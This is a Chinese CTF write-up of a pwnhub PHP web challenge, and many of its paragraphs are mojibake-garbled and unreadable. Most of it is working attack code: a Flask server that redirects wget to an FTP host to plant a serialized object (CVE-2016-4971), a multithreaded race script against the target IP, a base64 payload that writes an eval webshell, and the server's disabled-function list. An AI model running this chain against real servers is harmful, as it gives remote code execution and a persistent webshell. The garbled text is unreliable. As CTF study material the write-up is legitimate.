
pwnhub_another php web部分

2017/03/05

周末不是太有时间，所以就没怎么打pwnhub，后来快结束的时候完成了web部分，这里贴一下web部分的wp吧

开始没啥可说的，应该是用来当一些咸鱼的吧，index.php~

image_1bafa2nvpl7hl7n14d71sjk4g3m.png-15.1kB

登陆框，验证码很普通的，没啥可说的，试了试没啥可玩的，那就扫目录，找到了.svn

http://52.80.32.116/2d9bc625acb1ba5d0db6f8d0c8b9d206/.svn/
400

璺戣剼鏈嫋婧愮爜鎶ラ敊浜嗭紝鎼滀簡鎼滃ソ鍍忔槸鎷栫殑鏁版嵁搴撴姤閿欎簡锛屾墍浠ユ墜鍔ㄧ湅鐪嬶紝濂藉儚鏄唴瀹硅鏀硅繃浜

http://52.80.32.116/2d9bc625acb1ba5d0db6f8d0c8b9d206/.svn/wc.db
Myname:Pwnhub{6666666flag}
havefun:)
用户名和密码相同
The a9b4d7cc810da015142f61f7e236d50b.php:)Welcome Pwnhub{6666666flag}

image_1bad45g037c73iessr9qgp4u9.png-33.2kB

源码是phpjm加密，没啥可说的，直接工具解

http://tool.lu/php/

拿到源码

<?php
// Full error reporting. Depending on display_errors, PHP notices/warnings
// (e.g. from unserialize() or mkdir()) may be echoed to the client, which
// helps an attacker probe the script.
error_reporting(E_ALL);
// Per-session working directory. Empty until set_context() fills it in;
// read by the shutdown handler pwnhubfile().
$firesun_path = '';
// Deserialization gadget. __wakeup() runs whenever an object of this class is
// unserialize()d -- in this script that happens in set_context(), on the
// contents of the 'firesun' file -- and then evals a base64-decoded POST body.
class Pwnhub
{
function __wakeup()
{
// NOTE: isset() returns a bool, so this is `true == "firesun"`, which PHP's
// loose comparison evaluates to true for ANY present ?pwnhub= value; the
// literal "firesun" is never actually compared.
if (isset($_GET['pwnhub']) == "firesun") {
echo "Hacked by Firesun!";
// Arbitrary code execution: the POST body is decoded and eval'd as PHP.
eval(base64_decode($_POST['pwnhub']));
}
}
}
// Shutdown hook: writes the current $_SESSION array, PHP-serialized, to
// <$firesun_path>/firesun, overwriting whatever is there. Because it runs at
// request end, it clobbers a 'firesun' file that a download during the request
// may have created in that directory -- the window the race in this write-up
// exploits. If set_context() was never reached, $firesun_path is '' and the
// target path is '/firesun'.
function pwnhubfile()
{
global $firesun_path;
file_put_contents($firesun_path . '/firesun', serialize($_SESSION));
}
session_start();
// Registered before set_context() and the download, so it runs on every exit
// path, including die().
register_shutdown_function('pwnhubfile');
// Binds the request to the per-session directory /var/www/data/<id>, chdir()s
// into it and loads $_SESSION from the 'firesun' file found there (a fresh
// array if the file is absent). $id comes from the PHP session, not the URL.
// SECURITY: the file is passed straight to unserialize(); a serialized Pwnhub
// object placed there triggers Pwnhub::__wakeup().
function set_context($id)
{
global $_SESSION, $firesun_path;
$firesun_path = '/var/www/data/' . $id;
if (!is_dir($firesun_path)) {
mkdir($firesun_path);
}
// Presumably so the wget run by download_image() saves into this directory;
// wget_wrapper() itself is not shown, so this is inferred from the write-up.
chdir($firesun_path);
if (!is_file('firesun')) {
$_SESSION = array();
} else {
// Untrusted input to unserialize(): whatever the file currently holds.
$_SESSION = unserialize(file_get_contents('firesun'));
}
}
// Hands $url to wget_wrapper() (not shown) if it parses as an http:// URL
// whose path is exactly /pwnhub.png and which has no query string.
// Only the URL as parsed is validated: the host/port are unrestricted and
// nothing constrains where wget is redirected. On the old wget the hint says
// this box runs (CVE-2016-4971), an HTTP -> FTP redirect makes wget save the
// file under the FTP URL's filename instead of pwnhub.png.
function download_image($url)
{
$url = parse_url($origUrl = $url);
if (isset($url['scheme']) && $url['scheme'] == 'http') {
if ($url['path'] == '/pwnhub.png') {
if (isset($url['query'])) {
die('byebyebye');
}
// The original (unparsed) string is what gets fetched.
wget_wrapper($origUrl);
echo "Nice:)";
} else {
echo 'sorry!';
}
}
}
// Session id that names the working directory: 20 random hex chars on the
// first visit, otherwise the value already stored in the PHP session.
if (!isset($_SESSION['id'])) {
$sessId = bin2hex(openssl_random_pseudo_bytes(10));
$_SESSION['id'] = $sessId;
} else {
$sessId = $_SESSION['id'];
}
// Releases the PHP session (and, with the default file handler, its lock)
// before the slow download below, so a second request carrying the same
// PHPSESSID can run concurrently -- the precondition for the race.
session_write_close();
set_context($sessId);
if (isset($_POST['image'])) {
$p = $_POST['image'];
// Blacklist on the raw URL string. stripos() returns 0 when 'php' sits at
// offset 0, which is falsy, so that case slips through (should be
// `!== false`); moot here because download_image() requires an http scheme.
if (stripos($p, 'php')) {
echo 'wow!!!';
die('byebye');
}
download_image($p);
echo '<img src="pwnhub.jpg" width=184 height=200/>';
} else {
die('no image:(');
}
?>
<!-- pwnhubs0urcec0d3.zip -->
<?php

鍏抽敭闂鍦ㄤ簬鎬庝箞鎺у埗firesun鏂囦欢鍐呭鈥.

我们看看提示

2017.03.04 21:20:00 wget_wrapper就是wget，不要想着在url上做文章进行命令执行，过滤很严，wget版本较低，wget版本较低，wget版本较低，重要的话说三遍

根据提示和源码，我们发现是SECUINSIDE CTF Quals 2016 - Trendyweb改的，然后找到wget漏洞CVE-2016-4971（1.18 之前的 wget 在 HTTP 跳转到 FTP 时会按 FTP URL 里的文件名保存，而不是原始 URL 里的 pwnhub.png，所以可以让文件落地成 firesun），发现一篇wp

http://quanyang.github.io/secuinside-ctf-quals-2016-trendyweb/

鏍规嵁wp鑷繁鐮旂┒鍙戠幇绠鍗曠殑鏂瑰紡琚拰璋愪簡锛屾墍浠ュ彧鑳界珵浜夎В鍐抽棶棰樸

这里稍微梳理下竞争逻辑：

1銆佽闂殑鏃跺欎細鐢熸垚鐙湁鐨剆essionid锛屽苟鎵цset_context($sessId);锛岃幏鍙杅iresun鏂囦欢鍐呭銆

2銆佸湪绗竴娆¤姹傜粨鏉熷悗锛宲wnhubfile浼氭墽琛岀敓鎴恌iresun

// Shutdown hook (repeated from the listing above): serializes $_SESSION into
// <$firesun_path>/firesun, overwriting any 'firesun' wget left there during
// the request.
function pwnhubfile()
{
global $firesun_path;
file_put_contents($firesun_path . '/firesun', serialize($_SESSION));
}
// Runs pwnhubfile() at the end of every request, including die() paths.
register_shutdown_function('pwnhubfile');

但最重要的问题是 wget 默认不会覆盖同名文件：如果目录里已经有 firesun，再 wget 同名文件只会另存为 firesun.1。

涔熷氨鏄绗竴娆¤姹傜粨鏉熻繕娌¤兘鍙嶅簭鍒楀寲鎴愬姛锛屽氨浠h〃杩欓噷澶辫触浜嗐

鎵浠ユ垜浠瘡涓猻essionid鍙兘浣跨敤涓娆★紝杩欓噷闇瑕佷竴涓垚鐔熺殑澶氱嚎绋嬭剼鏈

鍏堥厤涓嚎涓婄幆澧冿紝寮涓涓猣lask鍔犱釜璺宠浆鑷砯tp

#!/usr/bin/env python
"""Redirect server for the wget race.

Every GET /pwnhub.png is answered with an HTTP redirect to an FTP URL whose
last path component, "firesun", is the filename the target ends up writing
into its session directory (the hint points at CVE-2016-4971 for why the
redirected filename wins over pwnhub.png).
"""
from flask import Flask, redirect

FTP_PAYLOAD_URL = "ftp://119.29.192.14/firesun"

app = Flask(__name__)


@app.route("/pwnhub.png")
def test():
    # Plain 302 to FTP; the target's wget follows it.
    return redirect(FTP_PAYLOAD_URL)


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8082)

然后另一个地方开个ftp，端口设为默认21（上面 flask 跳转的 ftp:// URL 没带端口，走的就是 21）

# Serve the current directory (where the crafted 'firesun' is placed) over FTP
# on port 21, the default port the Flask redirect above points wget at.
# Root is needed for the privileged port; pyftpdlib is a third-party module.
sudo python -m pyftpdlib -p 21

鐩綍涓嬪啓涓猣iresun

O:6:"Pwnhub":0:{}

多线程脚本

import requests
import threading
import time
from random import Random
# Vulnerable script recovered from the exposed .svn (see above); both hex path
# components are challenge-specific.
url = "http://52.80.32.116/2d9bc625acb1ba5d0db6f8d0c8b9d206/a9b4d7cc810da015142f61f7e236d50b.php"
def down(cookie):
    """Request 1 of the race: make the target download our pwnhub.png.

    The target's wget follows the Flask redirect to ftp://.../firesun and
    drops a file named 'firesun' into the session directory selected by
    ``cookie`` (a dict with PHPSESSID). The response body is not needed.
    """
    payload = {'image': 'http://119.29.192.14:8082/pwnhub.png'}
    requests.post(url, data=payload, cookies=cookie)
def ri(cookie):
    """Request 2 of the race: trigger the unserialize() with the same session.

    It has to arrive while request 1 is still running: after the target's
    session_write_close() (so the PHPSESSID already maps to the directory)
    and before its shutdown handler rewrites 'firesun'. ``?pwnhub=firesun``
    satisfies the __wakeup() check; the POST body is the base64 of the PHP
    that writes the eval webshell to image/ddoge.php.
    """
    payload = {'pwnhub': 'ZmlsZV9wdXRfY29udGVudHMoIi92YXIvd3d3L2h0bWwvMmQ5YmM2MjVhY2IxYmE1ZDBkYjZmOGQwYzhiOWQyMDYvaW1hZ2UvZGRvZ2UucGhwIiwgYmFzZTY0X2RlY29kZSgiUEQ5d2FIQWdaWFpoYkNna1gxQlBVMVJiTWwwcE96OCsiKSk7'}
    client = requests.Session()
    reply = client.post(url + "?pwnhub=firesun", data=payload, cookies=cookie)
    # The echo from Pwnhub::__wakeup() is the success marker.
    if "Hacked by Firesun" in reply.text:
        print(reply.text)
def random_str(randomlength=8):
    """Return a random string of ``randomlength`` characters, used as a fresh
    PHPSESSID so every attempt gets its own /var/www/data/<id> directory.

    Note: the upper index is len(chars) - 19 == 43, so only the first 44
    entries of ``chars`` (the letters A..V, both cases) can ever appear;
    the digits and the rest of the alphabet are unreachable. Kept as-is.
    """
    chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'
    max_index = len(chars) - 19
    rng = Random()
    return ''.join(chars[rng.randint(0, max_index)] for _ in range(randomlength))
# Fire 10000 attempts. Each one uses a fresh PHPSESSID (hence a fresh
# /var/www/data/<id> directory -- a used one only ever yields firesun.1) and
# starts the two halves of the race back to back. The threads are never
# joined; the interpreter simply waits for them before exiting.
for _ in range(0, 10000):
    jar = {'PHPSESSID': random_str(26)}
    for worker in (down, ri):
        threading.Thread(target=worker, args=(jar,)).start()

能成功，但是几率不高（第二个请求必须恰好落在第一个请求 session_write_close() 之后、wget 写完 firesun 之后、shutdown 重写 firesun 之前的窗口里），我们把shell写入到image/中

韪╀簡涓湝姹佸潙锛宐ase64_decode杩囧悗浼氭妸<?php ?>涓棿鐨勪笢瑗跨渷鐣ユ帀鈥︽墍浠ュ張鍔犱簡涓灞傘

<?php eval($_POST[2]);?>
// Stage 2: the PHP that Pwnhub::__wakeup() evals (sent base64-encoded in the
// POST body). It writes the stage-3 webshell, itself base64-encoded so the
// "<?php ... ?>" never appears literally inside the eval'd code.
file_put_contents("/var/www/html/2d9bc625acb1ba5d0db6f8d0c8b9d206/image/ddoge.php", base64_decode("PD9waHAgZXZhbCgkX1BPU1RbMl0pOz8+"));
ZmlsZV9wdXRfY29udGVudHMoIi92YXIvd3d3L2h0bWwvMmQ5YmM2MjVhY2IxYmE1ZDBkYjZmOGQwYzhiOWQyMDYvaW1hZ2UvZGRvZ2UucGhwIiwgYmFzZTY0X2RlY29kZSgiUEQ5d2FIQWdaWFpoYkNna1gxQlBVMVJiTWwwcE96OCsiKSk7

寰堝鍑芥暟閮借繃婊や簡锛屾墍浠ュ彧鏈塭val鐨剋ebshell

exec,passthru,shell_exec,assert,glob,imageftbbox,bindtextdom,dir,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,symlink,chgrp,chmod,chown,dl,mail,readlink,stream_socket_server,fsocket,imap_mail,apache_child_terminate,posix_kill,proc_terminate,proc_get_status,syslog,openlog,ini_alter,chroot,fread,fgets,fgetss,file,readfile,ini_set,ini_restore,putenv,apache_setenv,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,fpassthru,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,fputs,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,highlight_file,show_source,copy,system,

image_1baf7qq8413qm1l5j8ff1dnn9u39.png-84.9kB

听ven师傅说后面是pwn php，我就不自找死路了，就到这里
